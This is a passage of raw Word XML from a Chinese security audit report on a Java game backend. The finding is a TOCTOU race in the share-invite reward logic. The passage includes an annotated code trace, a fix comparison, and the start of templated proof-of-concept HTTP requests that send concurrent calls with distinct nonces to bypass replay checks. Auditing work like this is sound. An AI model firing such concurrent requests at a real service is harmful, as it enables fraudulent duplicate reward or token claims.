          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 并行）同时发送，使两个请求在服务器端形成并发事务。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="951"/>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r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>taskExecutionService.updateProgress(inviterUserId, "3", 1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 被调用两次，攻击者获得双倍 level3 任务进度奖励；若任务奖励触发道具发放，则道具被重复发放。同样的攻击可对 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>shareType=level2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 重复（幂等判断条件：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>existingOpt.isPresent() &amp;&amp; inviteType &gt;= 2 &amp;&amp; isRegistered == 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，首次同样无行可锁）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>预防窗口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：时间窗口为两个事务的重叠时间，通常为数毫秒至数十毫秒。在事务较轻量的情况下，批量脚本（连续发送多批并发对）成功率较高。</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952"/>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953"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>权限级别：普通用户账号（需通过 TokenAuthFilter 的 Bearer Token 校验）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="954"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">额外前置条件：账号下需存在至少一名 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>user.inviter_user_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 指向自己且 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>is_kyc_verified=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的真实被邀请人（level3 场景）；level2 场景仅需有注册关系的被邀请人即可</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>&gt; 📎 该 sink 另有 3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受影响调用链（4 条）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="955"/>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ShareService.java.shareLevel3Success → UserInvitationRecord.java.setInviterUserId</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="956"/>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ShareService.java.shareLevel3Success → UserInvitationRecord.java.setInviteTime</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="957"/>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ShareService.java.shareLevel3Success → UserInvitationRecord.java.setIsKycCompleted</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="958"/>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ShareService.java.shareLevel3Success → User.java.getIsKycVerified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audit_m193_991_shareComplete_ctrl-path15of23.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m193_1021_shareComplete_ctrl-path17of23.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m193_1074_shareComplete_ctrl-path21of23.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m193_1084_shareComplete_ctrl-path22of23.md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：ShareService.java#shareLevel3Success</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_45" w:id="45"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞44：TOCTOU 竞态条件导致分享邀请任务奖励可被重复领取</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="959"/>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：shareLevel3Success / shareLevel2Success 首次记录无行锁保护引发 TOCTOU，可并发双重触发 updateProgress</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="960"/>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src/main/java/com/gameBack/mjservice/service/ShareService.java:shareLevel3Success</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="961"/>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业务逻辑漏洞（TOCTOU，先读后写非原子操作）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="962"/>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963"/>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：普通用户（需有效 Bearer Token + 至少一名真实 KYC 完成的被邀请人）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="964"/>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shareLevel3Success</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 与 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>shareLevel2Success</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 均依赖 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByInviterUserIdAndInviteeUserIdForUpdate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SELECT ... FOR UPDATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）实现并发去重。此机制存在根本性缺陷：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>`SELECT ... FOR UPDATE` 仅在目标行已存在时才能获取行级排他锁</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，若该 (inviterUserId, inviteeUserId) 组合为首次触发、数据库中尚无对应记录，则：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="965"/>
        </w:num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READ COMMITTED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 隔离级别（部分应用配置）下：空结果集的 FOR UPDATE 不加任何锁，并发两条事务立即穿透；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="966"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>REPEATABLE READ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 隔离级别（MySQL 默认）下：虽会申请 Gap Lock，但 InnoDB 的 Gap Lock 本身是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>兼容锁</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，两个并发事务可同时持有同一 gap 的 gap lock，互不阻塞，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>均能继续执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（Insert Intention Lock 才与 Gap Lock 冲突，但 INSERT 发生在 updateProgress 之后，为时已晚）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">两条并发事务均见 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>existingOpt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 为空，均跳过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>isPresent()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 判断，进而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>各自调用一次 `taskExecutionService.updateProgress(inviterUserId, "3", 1)`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，进度被计入两次。代码注释明确指出"满足条件自动发道具奖励"，若任务进度触发奖励阈值，攻击者可借此领取双倍道具或代币。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">对比同文件 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>applyDailyOrLevel1Share</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的正确做法：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userRepository.findByIdForUpdate(inviterUserId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 锁定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>必定存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>的用户行，在有记录的情况下真正串行化了并发请求，不存在此漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="967"/>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/api/share/complete</w:t>
              <w:br/>
              <w:t xml:space="preserve">  → SignAuthTestFilter（验签+nonce去重；不同nonce的两条并发请求均可通过）</w:t>
              <w:br/>
              <w:t xml:space="preserve">  → TokenAuthFilter（Bearer Token鉴权，userId注入request属性）</w:t>
              <w:br/>
              <w:t xml:space="preserve">  → ShareController.shareComplete（@CurrentUserId 获得安全的 inviterUserId）</w:t>
              <w:br/>
              <w:t xml:space="preserve">  → ShareService.shareComplete（shareType路由，同类self-invocation，合并入同一@Transactional）</w:t>
              <w:br/>
              <w:t xml:space="preserve">  → ShareService.shareLevel3Success</w:t>
              <w:br/>
              <w:t xml:space="preserve">      ↓ requireInviteeOfInviter 校验邀请关系（通过）</w:t>
              <w:br/>
              <w:t xml:space="preserve">      ↓ findByInviterUserIdAndInviteeUserIdForUpdate → 首次：空结果集，无有效行锁</w:t>
              <w:br/>
              <w:t xml:space="preserve">      ↓ 两并发事务均到达此处 → 各自执行 taskExecutionService.updateProgress("3", 1)  ← 漏洞点</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">      ↓ 两并发事务各自 save 新记录（若无唯一索引则两条均落库；若有唯一索引则一条回滚，但updateProgress可能已提交）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="968"/>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：任务进度被计+2，若触发奖励阈值可自动发放双倍道具/代币，在有多名被邀请人的场景下可对每个合法 invitee 重复执行，累计资产损失规模随被邀请人数量线性增长。</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入口：ShareController.java</w:t>
              <w:br/>
              <w:t>// ShareCompleteForm 攻击者可控字段：</w:t>
              <w:br/>
              <w:t>//   Long inviterUserId;  ← 可为 null（null 时跳过校验），服务层始终使用 Token 中的 userId</w:t>
              <w:br/>
              <w:t>//   Long inviteeUserId;  ← 攻击者可控，须经后续邀请关系校验</w:t>
              <w:br/>
              <w:t>//   String shareType;    ← 攻击者可控，传 "level3" 触发目标分支</w:t>
              <w:br/>
              <w:t>@PostMapping("/complete")</w:t>
              <w:br/>
              <w:t>public ApiResponse&lt;Void&gt; shareComplete(@CurrentUserId Long userId, @RequestBody ShareCompleteForm form) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (form.getInviterUserId() != null &amp;&amp; !form.getInviterUserId().equals(userId)) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        throw new IllegalArgumentException("inviterUserId 须与当前登录用户一致");</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    shareService.shareComplete(userId, form.getInviteeUserId(), form.getShareType()); // ← inviteeUserId + shareType 污点传入</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return ApiResponse.success();</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② Service 路由：ShareService.java#shareComplete</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>public void shareComplete(Long currentUserId, Long inviteeUserId, String shareType) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    String type = shareType != null ? shareType.trim().toLowerCase() : "";</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if ("level3".equals(type)) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        shareLevel3Success(currentUserId, inviteeUserId); // ← 同类 self-invocation，@Transactional 合并，无新事务边界</w:t>
              <w:br/>
              <w:t xml:space="preserve">        return;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if ("level2".equals(type)) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        shareLevel2Success(currentUserId, inviteeUserId); // ← 同样存在 TOCTOU</w:t>
              <w:br/>
              <w:t xml:space="preserve">        return;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    applyDailyOrLevel1Share(currentUserId, inviteeUserId);</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ③ 漏洞点：ShareService.java#shareLevel3Success</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>public void shareLevel3Success(Long inviterUserId, Long inviteeUserId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    User invitee = requireInviteeOfInviter(inviterUserId, inviteeUserId); // 邀请关系通过</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    if (in</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>vitee.getIsKycVerified() == null || invitee.getIsKycVerified() != 1) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        throw new IllegalArgumentException("用户不存在或用户未完成KYC认证"); // KYC 通过</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    Optional&lt;UserInvitationRecord&gt; existingOpt =</w:t>
              <w:br/>
              <w:t xml:space="preserve">            userInvitationRecordRepository.findByInviterUserIdAndInviteeUserIdForUpdate(inviterUserId, inviteeUserId);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ← 漏洞核心：首次请求时记录不存在，FOR UPDATE 对空结果集无法获得行级排他锁</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ← 并发两条事务：均查到 existingOpt=empty，均不被阻塞，均通过以下 isPresent() 检查</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (existingOpt.isPresent() &amp;&amp; Integer.valueOf(1).equals(existingOpt.get().getIsKycCompleted())) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        minerService.unlockSlot(inviterUserId, 9, 3);</w:t>
              <w:br/>
              <w:t xml:space="preserve">        return; // ← 首次并发时两条事务均不走此 return</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    minerService.unlockSlot(inviterUserId, 9, 3);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    taskExecutionService.updateProgress(inviterUserId, "3", 1); // ← 两条并发事务各执行一次，进度 +2，可触发双倍奖励</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userInvitationRecordRepository.save(record); // ← 记录此时才落库，对本次并发窗口已无保护作用</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ④ 对比参照（正确实现）：ShareService.java#applyDailyOrLevel1Share</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>public void applyDailyOrLevel1Share(Long inviterUserId, Long inviteeUserId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userRepository.findByIdForUpdate(inviterUserId) // ← 锁定必定存在的用户行，真正串行化并发</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .orElseThrow(() -&gt; new IllegalArgumentException("邀请用户不存在"));</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // 后续逻辑被行锁保护，不存在 TOCTOU</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 xml:space="preserve">使用不同 nonce 绕过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SignAuthTestFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的 nonce 重放检测，并发提交两条请求（在同一毫秒内发送，确保命中首次记录写入前的竞态窗口）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>请求 1（与请求 2 并发发送）：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&lt;目标服务器&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;攻击者账号A的有效Token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-App-Key: &lt;appKey&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;当前Unix时间戳&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;随机nonce_1&gt;</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;按签名算法对当前请求体+参数计算的签名_1&gt;</w:t>
              <w:br/>
              <w:br/>
              <w:t>{</w:t>
              <w:br/>
              <w:t xml:space="preserve">  "inviteeUserId": &lt;账号B的userId，B.inviterUserId == A.userId 且 B.isKycVerified == 1&gt;,</w:t>
              <w:br/>
              <w:t xml:space="preserve">  "shareType": "level3"</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请求 2（与请求 1 并发发送）：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/api/share/complete HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;目标服务器&gt;</w:t>
              <w:br/>
